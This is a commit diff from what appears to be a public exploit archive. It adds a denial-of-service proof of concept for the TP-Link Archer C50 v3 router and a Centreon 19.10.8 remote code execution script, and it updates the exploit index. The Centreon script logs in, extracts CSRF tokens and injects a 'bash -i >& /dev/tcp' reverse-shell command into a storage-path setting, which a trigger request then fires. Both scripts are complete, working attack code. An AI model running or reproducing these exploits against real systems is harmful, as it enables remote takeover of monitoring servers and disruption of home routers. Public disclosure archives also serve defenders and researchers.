DB: 2020-03-27

3 changes to exploits/shellcodes TP-Link Archer C50 3 - Denial of Service (PoC) Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
2020-03-27 05:01:46 +00:00 · 2020-03-27 05:01:46 +00:00 · 4b289033f4
commit 4b289033f4
parent 606ad946d3
4 changed files with 136 additions and 0 deletions
--- a/exploits/hardware/webapps/48255.py
+++ b/exploits/hardware/webapps/48255.py
@ -0,0 +1,42 @@
+# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC)
+# Date: 2020-01-25
+# Exploit Author: thewhiteh4t
+# Vendor Homepage: https://www.tp-link.com/
+# Version: TP-Link Archer C50 v3 Build 171227
+# Tested on: Arch Linux x64
+# CVE: CVE-2020-9375
+# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html
+
+import time
+import socket
+
+ip = '192.168.0.1'
+port = 80
+
+print('[+] IP   : ' + ip)
+print('[+] Port : ' + str(port))
+
+for i in range(2):
+	time.sleep(1)
+	try:
+		print('[+] Initializing Socket...')
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		s.settimeout(5)
+		print('[!] Connecting to target...')
+		s.connect((ip, port))
+		header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)
+		header = header.encode()
+		print('[!] Sending Request...')
+		s.sendall(header)
+		print('[!] Disconnecting Socket...')
+		s.close()
+		if i == 1:
+			print('[-] Exploit Failed!')
+			break
+	except Exception as e:
+		if 'Connection refused' in str(e):
+			print('[+] Connection Refused...Exploit Successful!')
+			break
+		else:
+			print('[-] Exploit Failed!')
+			break
--- a/exploits/php/webapps/48241.py
+++ b/exploits/php/webapps/48241.py
@ -5,6 +5,7 @@
 # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
 # Version: rConfig 3.9.4
 # Tested on: Cent OS 7 (1908)
+# CVE: CVE-2020-10879

 #!/usr/bin/python3

--- a/exploits/php/webapps/48256.py
+++ b/exploits/php/webapps/48256.py
@ -0,0 +1,91 @@
+# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
+# Date: 2020-03-25
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.centreon.com/
+# Version: 19.10.8
+# Tested on: CentOS
+# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce
+# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607 
+
+#!/usr/bin/python
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+	exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+req = requests.session()
+print("[+] Retrieving CSRF token...")
+loginPage = req.get(url+"/index.php")
+response = loginPage.text
+s = BeautifulSoup(response, 'html.parser')
+centreon_token = s.find('input', {'name':'centreon_token'})['value']
+
+login_creds = {
+    "useralias": username,
+    "password": password,
+    "submitLogin": "Connect",
+    "centreon_token": centreon_token
+}
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/index.php", login_creds)
+
+if "incorrect" not in login.text:
+    print("[+] Logged In, retrieving second token")
+
+    page = url + "/main.get.php?p=50118"
+    second_token_req = req.get(page)
+    response = second_token_req.text
+    s = BeautifulSoup(response, 'html.parser')
+    second_token = s.find('input', {'name':'centreon_token'})['value']
+
+    payload = {
+        "RRDdatabase_path": "/var/lib/centreon/metrics/",
+        "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),
+        "RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",
+        "reporting_retention": "365",
+        "archive_retention": "31",
+        "len_storage_mysql": "365",
+        "len_storage_rrd": "180",
+        "len_storage_downtimes": "0",
+        "len_storage_comments": "0",
+        "partitioning_retention": "365",
+        "partitioning_retention_forward": "10",
+        "cpartitioning_backup_directory": "/var/cache/centreon/backup",
+        "audit_log_option": "1",
+        "audit_log_retention": "0",
+        "submitC": "Save",
+        "gopt_id": "",
+        "o": "storage",
+        "o": "storage",
+        "centreon_token": second_token,
+
+
+    }
+    print("[+] Sendin payload...")
+    send_payload = req.post(page, payload)
+
+    trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"
+    print("[+] Triggerring payload...")
+    trigger = req.get(trigger_url)
+
+    print("[+] Check your listener !...")
+
+else:
+    print("[-] Wrong credentials")
+    exit()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -42501,3 +42501,5 @@ id,file,description,date,author,type,platform,port
 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,
 48248,exploits/php/webapps/48248.txt,"Joomla! Component GMapFP 3.30 - Arbitrary File Upload",2020-03-25,ThelastVvV,webapps,php,
 48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
+48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
+48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,